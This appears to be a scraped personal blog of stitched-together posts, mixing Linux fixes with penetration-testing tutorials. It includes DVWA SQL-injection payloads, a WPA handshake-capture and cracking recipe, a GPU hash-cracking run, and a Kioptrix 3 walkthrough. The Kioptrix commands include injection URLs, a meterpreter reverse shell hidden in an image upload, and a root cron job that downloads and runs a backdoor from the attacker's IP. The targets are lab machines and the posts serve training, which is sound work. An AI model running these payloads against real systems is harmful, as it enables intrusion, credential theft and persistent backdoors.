As Pentoo 2013.0 RC1.1 is using hardened kernel, some application may not working properly. You may need to inspect and change the pax settings of the application in order to make it to work properly.



Use paxctl to inspect and change the pax settings.



paxctl -h

paxctl -v [application name]



Since the current Pentoo 2013.0 RC1.1 (as updated to April 29, 2013), the CUDA do not work properly by default. You are required to do something on it. This bug may be fixed in the next update or RC version.



First of all, make sure the libraries of CUDA are loading properly by making sure the following lines are at the file /etc/env.d/99cuda :



cat /etc/env.d/99cuda



PATH=/opt/cuda/bin:/opt/cuda/libnvvp

ROOTPATH=/opt/cuda/bin

LD_LIBRARY_PATH=/opt/cuda/lib64:/opt/cuda/lib



Finally, make sure some of the applications are set to proper pax settings. For example, cudaHashcat-plus64.bin and Cryptohaze-Multiforcer which are running with CUDA but they are not setting with pax flags properly at the current version.



Make sure the pax settings should be shown as the following :







Known Issue



The current version/update as on April 29, 2013, the pyrit does not work properly with CUDA. Since pyrit is written in Python, the paxctl does not work at all. According to one of the developers, the pyrit will be removed from the distribution.



Thats all! See you.

Read More..

To install Scapy



sudo apt-get update
sudo apt-get install python-scapy python-pyx python-gnuplot



To run Scapy interactively



sudo scapy



The scapy shell will be displayed :


WARNING: No route found for IPv6 destination :: (no default route?)

Welcome to Scapy (2.2.0)

>>>



To quit Scapy



>>>quit()


Thats all! See you.

Read More..

Security level = low



99 or 1=1

- will display all the records



99 or 1=1 union select 1,2,3

- will display "The used SELECT statements have a different number of columns" error message



99 or 1=1 union select 1,2

- no error message but display all records



99 or 1=1 union select null,null

- no error message but display all records



99 or 1=1 union select version(),database()

- will display the version of MySQL and the database name - dvwa



99 or 1=1 union select null, user()

or

99 or 1=1 union select user(), null

- will display the current user of the database



99 or 1=1 union select null, table_name from information_schema.tables

- will display all the table names



99 or 1=1 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name=users

- will display the users table column list



99 or 1=1 union select null, concat(first_name,0x0a,password) from users

- we are looking for users tables first_name and password



99 or 1=1 union select null,@@datadir

- will display the mysql directory



99 or 1=1 union all select null,load_file(/etc/passwd)

- will display the content of /etc/passwd



Security level = medium



99 or 1=1

- will display all the records



99 or 1=1 union select 1,2,3

- will display "The used SELECT statements have a different number of columns" error message



99 or 1=1 union select 1,2

- no error message but display all records



99 or 1=1 union select null,null

- no error message but display all records



99 or 1=1 union select version(),database()

- will display the version of MySQL and the database name - dvwa



99 or 1=1 union select null, user()

or

99 or 1=1 union select user(), null

- will display the current user of the database



99 or 1=1 union select null, table_name from information_schema.tables

- will display all the table names



99 or 1=1 union select null, concat(table_name,0x0a,column_name) from information_schema.columns

- since where clause cannot be used, all column name should be listed



or



99 or 1=1 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name=0x7573657273

- where 0x7573657273 is Hex value of "users"



99 or 1=1 union select null, concat(first_name,0x0a,password) from users

- we are looking for users tables first_name and password



99 or 1=1 union select null,@@datadir

- will display the mysql directory



sqlmap for Security = low



./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -T users --columns



For Security = medium is similar.



Thats all! See you!

Read More..

The Problem



When I upgraded my FreeNAS to the latest version FreeNAS 8.0.3 RELEASE p1, it refused to boot and stop at the following message.



mountroot> GEOM: da0s1: geometry does not match label (16h,63s != 255h,63s).

GEOM: da0s2: geometry does not match label (16h,63s != 255h,63s).



I typed the following command and it boots fine.



ufs:/dev/da0s1a



The problem is that I need to type the captioned command on each boot up. How to solve this problem? Yes, I can.



The Solution



After the system is booting up and a menu is displayed. Select "9) Shell" to go to the shell prompt where we can do the following.



Step 1 :



nano /etc/fstab



Change from :

/dev/ufs/FreeNASs1a / ufs ro 1 1



To :

/dev/ufs/FreeNASs1a / ufs rw 1 1



Step 2 :



Then, save and exit the editor. Execute the following command :



mount -a



Step 3 :



Next, open up another file :



nano /boot/loader.conf



Change from :

#Fix booting from USB device bug

kern.cam.boot_delay=10000



To :

#Fix booting from USB device bug

kern.cam.boot_delay=20000



Save and exit the editor. Then reboot. This time, the boot up is much slower than before but it works. Problem solved!



Thats all! See you.

Read More..

Step 1 :



Download and install the LimeChat from Apple Apps Store on you Mac.



Step 2 :



LimeChat >> Preferences >> Interface >> Layout of the main window >> 3 Columns

LimeChat >> Server >> Server Properties >> General >> Network name -- TorifiedFreenode

LimeChat >> Server >> Server Properties >> General >> Server -- 10.40.40.40

LimeChat >> Server >> Server Properties >> General >> Port -- 6667

LimeChat >> Server >> Server Properties >> General >> Nickserv Pasword -- [your SASL password]

LimeChat >> Server >> Server Properties >> General >> Use SASL >> selected



LimeChat >> Server >> Server Properties >> Details >> Proxy >> SOCKS 5 proxy

LimeChat >> Server >> Server Properties >> Details >> Homename >> 127.0.0.1

LimeChat >> Server >> Server Properties >> Details >> Port >> 9150



LimeChat >> Server >> Server Properties >> On Login >> #infosec-ninjas [add some channels]



Step 3 :



Go to Tor official website to download and install "Tor Browser Bundle for 64-Bit Mac".



Step 4 :



Run "TorBrowser_en-US".



Vidalia Control Panel >> Settings >> Advanced >> Edit current torrc



Append the following :



MapAddress 10.40.40.40 p4fsi4ockecnea7l.onion



Select it and then "Apply selection only" >> OK



Step 5 :



Close LimeChat and Stop Tor as well as close Vidalia Control Panel.



Then restart Vidalia Control Panel and LimeChat. TorBrowser will start up too.



Thats all! See you.

Read More..

*** CAUTION : This tutorial is written for Penetration Test only. Otherwise, you may be arrested if you attack/intrude any other network/computer without authorization. ***



Software :

Back|Track 4 R1

Ubuntu 10.10 Desktop

VirtualBox 3.2.10 r66523



Hardware :

Lenovo ThinkPad X200 with 4GB RAM and 80GB SSD



Lenovo ThinkPad X200 is installed Ubuntu 10.10 Desktop edition. On which, installs VirtualBox.



Go to the Oracle VM VirtualBox site to download the VirtualBox :

http://dlc.sun.com/virtualbox/vboxdownload.html#linux



(A) Create Back|Track virtual machine :



Select at least 8GB virtual hard drive place and 512MB RAM for the Back|Track. The first network adapter is set to "NAT" while the second is set to "Host-Only".



Boot up Back|Track from the VirtualBox and click on "install.sh" to install Back|Track.



Login for further setting. The username is "root" and the password is "toor".



Step 1 :



After the installation, you may execute the following command to fix the screen size to 800x600.



fix-splash800



Then, change the password of the root when necessary. Otherwise, the username is "root" while the password is "toor".



Execute the following command to make Back|Track to start network interface and X.org when bootup each time.



kate /root/.bash_profile



Append the following lines :



start-network

startx



Step 2 :



To install VirtualBox Additions when necessary via "Konqueror" -- "Storage Media" -- "media:/hdc".



bash VBoxLinuxAdditions-x86.run



Step 3 :



apt-get -y update

apt-get -y upgrade



Step 4 :



Go to "Menu" -- "BackTrack" -- "Penetration" -- "Fast Track". Select "Fast-Track Interactive" and choose "1".



Step 4a :



Go to "Menu" -- "BackTrack" -- "Penetration" -- "ExploitDB". Select "Update Exploitdb".



Step 4b :



Go to "Menu" -- "BackTrack" -- "Penetration" -- "Social Engineering Toolkit". Select "S.E.T-Update".



Step 5 :



At the terminal, execute the following command :



airodump-ng-oui-update



Step 6 :



Go to "Menu" -- "BackTrack" -- "Vulnerability Identification" -- "OpenVAS" -- "OpenVAS NVT Sync".



Step 7 :



Update the Add-ons of Firefox.



Step 8 :



apt-get -y install crark

apt-get -y install wbox

apt-get -y install vlc



Step 9 :



Update the Framework. However, it will take several hours.



cd /pentest/exploits/framework3/

svn up



Step 10 :



Reboot the system.



(B) Create Metasploitable virtual machine (Optional)



Go to the following link to download the "Metasploitable" which is an Ubuntu 8.04 server with some flaws.



http://blog.metasploit.com/2010/05/introducing-metasploitable.html



Set the downloaded Metasploitable as virtual hard drive at VirtualBox. The network adapter is set to "Host-Only". The virtual hard disk space is at least 8GB and 512MB RAM for the Metasploitable.



(C) The final



Now, the IP address of eth0 of Metasploitable is similar to 192.168.56.101. The IP address of eth0 and eth1 of Back|Track are similar to 10.0.2.15 and 192.168.56.102 respectively.



You may require to execute the following command at Back|Track in order to see the two network interfaces and their IPs.



/etc/init.d/networking restart



Back|Track can access (or ping) Metasploitable via IP address. Back|Track can surf the internet but Metasploitable cannot.



At last, your penetration environment is set up.



(D) Free Tutorials



(1) Metaploit Unleashed

(2) Fast-Track

(3) Social-Engineer Tootkit

(4) Got Milk?

(5) How to Metasploit Beginner to Advanced (Video)



(E) Non-free Training



Offensive Security



(F) Resources



(1) Exploits Database

(2) Metaploit Blog

(3) Offensive security Blog

(4) Yet another Back|Track in Gnome

(5) Metasploit



Thats all! See you.

Read More..

App Inventor for Android is another example of Cloud Computing. You can build your Android apps from the Java enabled browser and sync to your Android device at ease. In addition, everyone can build Android apps by App Inventor for Android without any deep knowledge of Java and/or programming.



Go to Register Form to register your account for App Inventor for Android. You may require to wait for several weeks in order to receive the access permission email from Google.



On your Android device



Download and install "AppInventor Toggle" from the Market of your Android device.



Run "AppInventor Toggle", press "Menu", enable "Cable Detection" and disable "AppInventor Orientation".



Exit "AppInventor Toggle", Press "Menu", "Settings", "Applications" and "Development", then enable "USB Debugging"



On your Ubuntu 10.04 desktop



Ubuntu 10.04 comes with OpenJDK (open source version of Java) and it is ready to go. You can download OpenJDK at Ubuntu Software Centre if it is not installed. Or, you can use Sun Java instead but you are required to enable the repository at "System", "Administration", "Synaptic management".



Be keep in mind that App Inventor for Android official site recommend Sun Java instead of OpenJDK. If you encounter abnormal behavior on the web application, please install Sun Java instead.



Go to Extra Software page and download the Debian package. The current version at this writing is 1.02.



sudo dpkg -i appinventor-extras_1.02_all.deb



You may encounter "Unable to get SyncService for device" when you are connecting to your Android smartphone from Blocks Editor of App Inventor web application. The following is the procedure to solve this problem.



sudo nano /etc/udev/rules.d/51-android.rule



Append the following line.

SUBSYSTEMS=="usb", ATTRS{idVendor}=="0bb4", ATTRS{idProduct}=="0ff9", MODE="0666



Create a shell script.

nano android-syncservice



Append the following lines.

#!/bin/sh

# Solve the problme of "Unable to get SyncService for device" while connecting to Nexus One under Blocks Editor of App Inventor

cd /usr/google/appinventor-extras/commands-for-Appinventor/

./adb kill-server

./adb devices

cd ~

exit 0



Copy the shell script to /etc/init.d and make it running automatically on every boot.

sudo cp android-syncservice /etc/init.d/

sudo chmod +x /etc/init.d/android-syncservice



sudo update-rc.d android-syncservice defaults



Or, you may require to reboot your system when need.



Now connect your Android device to your Ubuntu 10.04 desktop with the USB cable. You are ready to go ....



Follow the instructions at Connect App Inventor to Your Phone.



Then, study the Tutorials.



Finally, Live Development, Testing and Debugging.



Known Issue



The size of the apk (application package) is quite large, it is at least about 3 to 4 MB of size for a very simple application, such as tutorial apps.



Thats all! See you.

Read More..

Dont crack any wifi router without authorization; otherwise, you will be put into the jail.



(A) General Display card



Step 1 :



airmon-ng



The result will be something like :



Interface    Chipset      Driver

wlan0        Intel 5100   iwlagn - [phy0]





Step 2 :



airmon-ng start wlan0



Step 3 (Optional) :



Change the mac address of the mon0 interface.



ifconfig mon0 down

macchanger -m 00:11:22:33:44:55 mon0

ifconfig mon0 up



Step 4 :



airodump-ng mon0



Then, press "Ctrl+c" to break the program.



Step 5 :



airodump-ng -c 3 -w wpacrack --bssid ff:ff:ff:ff:ff:ff --ivs mon0



*where -c is the channel

           -w is the file to be written

           --bssid is the BSSID



This terminal is keeping running.



Step 6 :



open another terminal.



aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c 99:88:77:66:55:44 mon0



*where -a is the BSSID

           -c is the client MAC address (STATION)



Wait for the handshake.



Step 7 :



Use the John the Ripper as word list to crack the WPA/WP2 password.



aircrack-ng -w /pentest/passwords/john/password.lst wpacrack-01.ivs



Step 8 (Optional) :



If you do not want to use John the Ripper as word list, you can use Crunch.



Go to the official site of crunch.

http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/



Download crunch 3.0 (the current version at the time of this writing).

http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/crunch-3.0.tgz/download



tar -xvzf crunch-3.0.tgz

cd crunch-3.0

make

make install



/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | aircrack-ng wpacrack-01.ivs -b ff:ff:ff:ff:ff:ff -w -



*where 8 16 is the length of the password, i.e. from 8 characters to 16 characters.



(B) nVidia Display Card with CUDA



If you have nVidia card that with CUDA, you can use pyrit to crack the password with crunch.



Step a :



airmon-ng



The result will be something like :



Interface    Chipset      Driver

wlan0        Intel 5100   iwlagn - [phy0]





Step b :



airmon-ng start wlan0



Step c (Optional) :



Change the mac address of the mon0 interface.



ifconfig mon0 down

macchanger -m 00:11:22:33:44:55 mon0

ifconfig mon0 up



Step d :



airodump-ng mon0



Then, press "Ctrl+c" to break the program.



Step e :



airodump-ng -c 3 -w wpacrack --bssid ff:ff:ff:ff:ff:ff mon0



Step f :



open another terminal.



aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c 99:88:77:66:55:44 mon0



*where -a is the BSSID

           -c is the client MAC address (STATION)



Wait for the handshake.



Step g :



If the following programs are not yet installed, please do it.



apt-get install libghc6-zlib-dev libssl-dev python-dev libpcap-dev python-scapy



Step h :



Go to the official site of crunch.

http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/



Download crunch 3.0 (the current version at the time of this writing).

http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/crunch-3.0.tgz/download



tar -xvzf crunch-3.0.tgz

cd crunch-3.0

make

make install



Step i :



Go to the official site of pyrit.



http://code.google.com/p/pyrit/downloads/list



Download pyrit and cpyrit-cuda (the current version is 0.4.0 at the time of this writing).



tar -xzvf pyrit-0.4.0.tar.gz

cd pyrit-0.4.0

python setup.py build

sudo python setup.py install



tar -xzvf cpyrit-cuda-0.4.0.tar.gz

cd cpyrit-cuda-0.4.0

python setup.py build

sudo python setup.py install



Step j :



/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | pyrit --all-handshakes -r wpacrack-01.cap -b ff:ff:ff:ff:ff:ff -i - attack_passthrough



*where 8 16 is the length of the password, i.e. from 8 characters to 16 characters.



Step k (Optional) :



If you encounter error when reading the wpacrack-01.cap, you should do the following step.



pyrit -r wpacrack-01.cap -o new.cap stripLive



/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | pyrit --all-handshakes -r new.cap -b ff:ff:ff:ff:ff:ff -i - attack_passthrough



*where 8 16 is the length of the password, i.e. from 8 characters to 16 characters.



Step l :



Then, you will see something similar to the following.



Pyrit 0.4.0 (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com

This code is distributed under the GNU General Public License v3+



Parsing file new.cap (1/1)...

Parsed 71 packets (71 802.11-packets), got 55 AP(s)



Tried 17960898 PMKs so far; 17504 PMKs per second.



Remarks :



If you have an nVidia GeForce GTX460 (336 CUDA cores), the speed of cracking is about 17,000 passwords per second.



To test if your wireless card (either USB or PCI-e) can do the injection or not :



airodump-ng mon0

Open another terminal.

aireplay-ng -9 mon0



Make sure pyrit workable on your system :



pyrit list_cores



Thats all! See you.

Read More..

Weevely is a stealth PHP web shell that simulate an SSH-like connection. It is an essential tool for web application post exploitation, and can be used as stealth backdoor or as a web shell to manage legit web accounts, even free hosted ones.



Step 1 :



sudo apt-get install git



sudo -sH

cd /opt

git clone git://github.com/epinna/Weevely.git



Step 2 :



To run it.



sudo -sH

cd /opt/Weevely

./weevely.py



Thats all! See you.

Read More..

The Cryptohaze Multiforcer is a high performance CUDA password cracker that is designed to target large lists of hashes. Performance holds very solid with large lists, such that on a suitable server, cracking a list of 1 000 000 passwords is not significantly slower than cracking a list of 10. For anyone who deals with large lists of passwords, this is a very useful tool! Algorithm support includes MD5, NTLM, LM, SHA1, and many others. The official website of Cryptohaze Multiforcer is here.



Download Cryptohaze-Linux_x64_1_30.tar.bz2



tar -xjvf Cryptohaze-Linux_x64_1_30.tar.bz2



cd Cryptohaze-Linux



nano single_charset



Append the following :



ABCEDFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890~!@#$%^&*()_+|}{":?><`-=][;/.,



Cracking the sample SHA1 hashes on my two nVidia GeForce GTX 590 system :



./Cryptohaze-Multiforcer -h SHA1 -f test_hashes/Hashes-SHA1-Full.txt -c single_charset --threads 512 --blocks 512 -m 500



Hardware Configuration :



CPU : Intel i7-3930K (12 cores with Hyper-Threading, Socket 2011)

Motherboard : ASUS SaberTooth X79

RAM : Corsair Vengeance DDR3 1600 32GB (4GB x 8)

Display Card : Inno3D nVidia GeForce GTX 590 384bit 3072MB DDR5 x 2

Hard Drive : Seagate SATA II 1TB x 2

Power Supply : Seasonic X-series 1250W

CPU Heat Sink : Corsair H100 Liquid CPU Cooler

Case : Corsair Graphite Series 600T Black



Remarks :



Installation of CUDA on Back|Track 5 R1



Thats all! See you.

Read More..

*** Do NOT attack any computer or network without authorization or you may put into jail. ***



Credit to : g0tmi1k



This is g0tmi1ks work but not mine. I re-post here for educational purpose only. It is because I enjoy his videos very much and I am afraid of losing them.



The original post at here



Links



Watch video on-line

Download video



Brief Overview



Its time for round 3 with Kioptrixs "Vulnerable-By-Design" series. Normal goal of "boot-to-root", by any means possible.



The target was fully compromised with a mixture of; SQL injection, re-used credentials and poorly configured setting. After gaining root access, to extent the video two methods of backdooring the system were installed as well as an alternative idea to escape privileges.



Method



Scanned network for the host (nmap)

Added IP address to the host file

Port scanned the host (unicornscan)

Banner grabbed the services running on the open ports (nmap)

Discovered usernames via a Local File Inclusion vulnerability (Firefox)

Enumerated database (manual MySQL injection)

Reused credentials granting a remote shell

Poorly configured setting to escape privileges (Unprotected limited root access)

Uploaded and used a web backdoor (Meterpreter)

Automated MySQL Injection (SQLMap)

Alternative method to gain root as well as escaping privileges (Cron Job)



What do I need?



Kioptrix VM Level 1.2 [KVM3.rar] (MD5: D324FFADD8E3EFC1F96447EEC51901F2)

A virtual machine (Example: Virtual Box or VMware Player)

Nmap – (Can be found on BackTrack 5).

Unicornscan – (Can be found in BackTrack 5s repository).

Exploit-DB – (Can be found on BackTrack 5).

John The Ripper – (Can be found on BackTrack 5).

SQLMap – (Can be found on BackTrack 5).

Metasploit – (Can be found on BackTrack 5).



Walkthrough



The attacker starts off with locating the target system on the network, which is done by using a quick "ping" scan via nmap.



Once the target has been discovered the attacker, adds the IP address to their host file. (The reasoning for this is due to Kioptrix using DHCP to assign its IP address and later on, the HTML code needs a "static reference" to use as a source).



Afterwards the attacker executes a TCP & UDP port scan by using unicornscan. The results show only two ports are open, TCP 22 and TCP 80. The attacker repeats the port scan however switches to nmap and enables the option to "banner grab" the services which are running on open ports, to enumerate running services. Nmap confirms that the same ports are open as well as the default services are also using them, SSH (TCP 22), and Web (TCP 80).



The attacker continues by interacting with the web server. Upon visiting the web server, the attacker is presented with a blog. When exploring the web site, the attacker notices a common URI, which often has a "Local/Remote File Include" vulnerability. The attacker uses this to their advantage by including a known file which commonly contains details of each user on the system. This shows that system has two possible users "loneferret" and "dreg".



One of the blog posts, referred to a product which is running on their web server, a new gallery. At the end of the post, contain the URL to the gallery. Another post, helped confirmed one of the usernames, "loneferret", as it was mentioned again.



After looking at the source code for the gallery, the attacker notices that the admin link in the template has been commented out, rather than being removed from the code completely. After visiting the page, the gallery service has been identified as "gallarific".



When checking to see if "Gallarific" has any known public exploits, they find it is subject to a SQL injection attack. The exploit gives the weak URL and the attacker manually starts enumerating the database. They start off by seeing which tables are accessible, then the names of the columns inside the "dev_account" table. This shows there are three fields, "id", "username" and "password". The attacker views the values and upon doing so, sees the same two usernames as before along with their respected MD5 hashes.



The attacker inserts the hashes into John the ripper, which quickly brute forces them (as they are not salted!), showing that loneferrets password is "starwars" and dregs is "Mast3r".



A common issue is password re-use, which the attacker is aware of, therefore they attempt to see if any of the users did so with their SQL and SSH credentials. Loneferret did.



After viewing loneferrts personal folder, there is a company readme file which explains their policy, that they must use a certain program, "ht" to create, view and edit files. However, in the example command, it says the employee needs to use "sudo" in which to do so. Sudo allows programs to be used with the security privileges of another user, which in this case is the super root account - root. This allows the attacker to create, view and edit any file.



With this, the attacker uses ht to "upgrade" their currently limited usage of the sudo to give them root access. After granting the upgrade of privileges, the attacker logs in as root. The attacker now has access to the complete system...



Game over



Because the attacker doesnt wish to keep exploiting the same box again, they want to place a backdoor, which allows for quicker access back into the system. The attacker searches for the admin credentials to the gallery product, as there is a high chance that there is an upload feature which they could try and take advantage of.



By using the same SQL injection as before, the attacker manually starts searching another table, "gallarific_users". The attacker soon finds the admin username & password, in plain text.



(Editors note: This stage isnt "needed", it was only done to show how automated tools simplify the whole process!)



The attacker then starts to enumerate the whole database, by using SQLMap. The tool quickly finds extra useful information regarding the database, as well as automatically attempting to crack any known password hash formats. This confirms everything which was found manually.



After logging in as the admin for the gallery, the attacker is able to confirm their suspicions from earlier, the product supported uploading. The attacker generates a PHP reserve shell with an image format and then uploads their evil image. Due to the product automatically checking file extensions, renaming uploaded images and the server configuration the attacker isnt able to execute the "image". However, due to the "local file include", which was found at the beginning, the attacker is able to execute the code inside the image, which creates a shell. The type of shell which the attacker is using to interact with the system isnt able switch users. But by using python which has already been installed locally on the system, the attacker is able to code a quick script to get around this limitation by using python to spawn a bash terminal in the background and relay commands into it.



Instead of modifying the sudoers file originally to gain root access to the system, the attacker writes a cron job to: start on the next minute, then as the root account, to download a file and execute it, as well as deleting the job (optional!). The attacker then creates the back door executable file as well as starting a web server to host the file for the target to download. The attacker then waits for the targets clock to reach the next minute and execute the command, spawning a remote root shell.



Game over...again



Commands



nmap 192.168.0.* -n -sn -sP

echo 192.168.0.10 kioptrix3.com >> /etc/hosts # Its in the readme

cat /etc/hosts

us -H -msf -Iv kioptrix3.com -p 1-65535 && us -H -mU -Iv kioptrix3.com -p 1-65535

nmap -p 1-65535 -T4 -A -v kioptrix3.com

firefox kioptrix3.com # Link-> Blog

http://kioptrix3.com/../etc/passwd.html

# Gallery --> Source code (gadmin): http://kioptrix3.com/gallery/gadmin/

cd /pentest/exploits/exploitdb

grep -i gallarific files.csv

cat platforms/php/webapps/15891.txt

firefox kioptrix3.com/gallery/gallery.php

http://kioptrix3.com/gallery/gallery.php?id=null and 1=2 union select 1,2,3,4,5,6

http://kioptrix3.com/gallery/gallery.php?id=null and 1=2 union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=database()),4,5,6

http://kioptrix3.com/gallery/gallery.php?id=null and 1=2 union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name=dev_accounts),4,5,6

http://kioptrix3.com/gallery/gallery.php?id=null and 1=2 union select 1,2,(select group_concat(id, 0x3A, username, 0x3A, password) from dev_accounts),4,5,6

echo -e "0d3eccfb887aabd50f243b3f155c0f85
5badcaf789d3d1d0 9794d8f021f40f0e" >> /tmp/hashes

cd /pentest/passwords/john

./john /tmp/hash --format=raw-md5

ssh loneferret@kioptrix3.com # starwars

id

pwd

ls -lA

cat CompanyPolicy.README

ls -lh /etc/sudoers

cat /etc/sudoers

sudo ht # starwars File -> Open: /etc/sudoers -> Edit loneferret: loneferret ALL=(ALL) ALL -> File -> Save

sudo su # starwars

id && ifconfig && uname -a && cat /etc/shadow && ls -lAh ~/

cd /etc/apache2/sites-enabled

ls

cat * | grep -i documentroot

exit

exit

firefox

http://kioptrix3.com/gallery/gallery.php?id=null and 1=2 union select 1,2,3,4,5,6

http://kioptrix3.com/gallery/gallery.php?id=null and 1=2 union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name=gallarific_users),4,5,6

http://kioptrix3.com/gallery/gallery.php?id=null and 1=2 union select 1,2,(select group_concat(userid, 0x3A, username, 0x3A, password, 0x3A, usertype) from gallarific_users),4,5,6

cd /pentest/database/sqlmap

./sqlmap.py -u "http://kioptrix3.com/gallery/gallery.php?id=1" -f -b --current-user --is-dba --dbs

./sqlmap.py -u "http://kioptrix3.com/gallery/gallery.php?id=1" --columns

./sqlmap.py -u "http://kioptrix3.com/gallery/gallery.php?id=1" --users --passwords

./sqlmap.py -u "http://kioptrix3.com/gallery/gallery.php?id=1" --file-read="/etc/passwd"

./sqlmap.py -u "http://kioptrix3.com/gallery/gallery.php?id=1" --dump

http://kioptrix3.com/gallery/gadmin # admin n0t7t1k4 Upload new pic

cd /pentest/backdoors/web/webshells

ls -lAh

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.0.192 LPORT=443 -f raw > /tmp/evil.jpg # msfpayload php/meterpreter/reverse_tcp LHOST=192.168.0.192 LPORT=443 R

msfcli multi/handler PAYLOAD=php/meterpreter/reverse_tcp LHOST=192.168.0.192 LPORT=443 E

firefox http://kioptrix3.com/gallery/photos/home/www/kioptrix3.com/gallery/photos/w835623l98.jpg.html

sysinfo

shell

su loneferret

echo "import pty; pty.spawn(/bin/bash)" > /tmp/shell.py

python /tmp/shell.py

su loneferret # starwars

sudo su # starwars

cd ~

ls

cat Congrats.txt

exit

exit

exit

exit

exit

ssh loneferrt@kioptrix3.com # starwars

cat CompanyPolicy.README

sudo ht

* * * * * root cd /tmp; wget 192.168.0.192/back.door && chmod +x back.door && ./back.door; rm /etc/cron.d/exploit # /etc/cron.d/exploit

msfpayload linux/x86/shell_reverse_tcp LHOST=192.168.0.192 LPORT=443 X > /var/www/back.door

file /var/www/back.door

/etc/init.d/apache2 start

msfcli multi/handler PAYLOAD=linux/x86/shell_reverse_tcp LHOST=192.168.0.192 LPORT=443 E

id

uname -a



Notes



- Editing the host file is mentioned in the README which is included (as well as on the blog post).



Thats all! See you.

Read More..

Do you encounter blue faces or wrong colour displayed on the YouTube videos on your Ubuntu 12.04 box? If yes, I recommend you to install Flash-Aid which can solve the problem.



Open your Firefox and go to here to install the plugin. Once the plugin is installed, you can click on the icon on the right top hand corner to install the correct Flash.



The official wording of Flash-Aid :



Remove conflicting flash plugins from Ubuntu/Debian Linux systems, install the appropriate version according to system architecture and apply some tweaks to improve performance and fix common issues.



Thats all! See you.



UPDATED on May 23, 2012 :

If your problem is still there and you have nVidia display card with "libvdpau1" installed, you should follow the steps below to solve the problem.

sudo add-apt-repository ppa:tikhonov/misc

sudo apt-get update

sudo apt-get install libvdpau1

This solution is workable on Ubuntu 12.04 LTS with flashplugin-installer 11.2.202.235ubuntu0.12.04.1 but not with Flash-Aid 2.2.3.

Read More..

The following videos are not created by me. They are created by one of my mentors, g0tmi1k. I re-post here for reference. Please credit to g0tmi1k.

To get Kioptrix 4 (Level 1.3) at here.

To find some hints and solutions, please refer to g0tmi1ks blog at here

g0tmi1k find three different ways to compromise the Kioptrix, here you are (Enjoy!!!) :

SQL Injection







Local File Inclusion







Limited Shell










Thats all! See you.

Read More..